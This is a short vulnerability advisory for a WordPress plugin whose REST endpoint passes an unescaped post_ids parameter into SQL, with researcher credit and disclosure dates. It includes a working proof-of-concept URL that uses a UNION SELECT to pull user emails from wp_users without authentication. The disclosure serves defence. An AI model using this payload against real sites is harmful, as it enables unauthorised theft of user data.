The plugin does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint, available to both unauthenticated and authenticated users. As a result, unauthenticated attackers could perform SQL injection attacks
https://example.com/?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20user_email,user_email,user_email%20from%20wp_users%20--%20g
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-01 (about 12 months ago)
2022-02-01 (about 12 months ago)
2022-04-13 (about 9 months ago)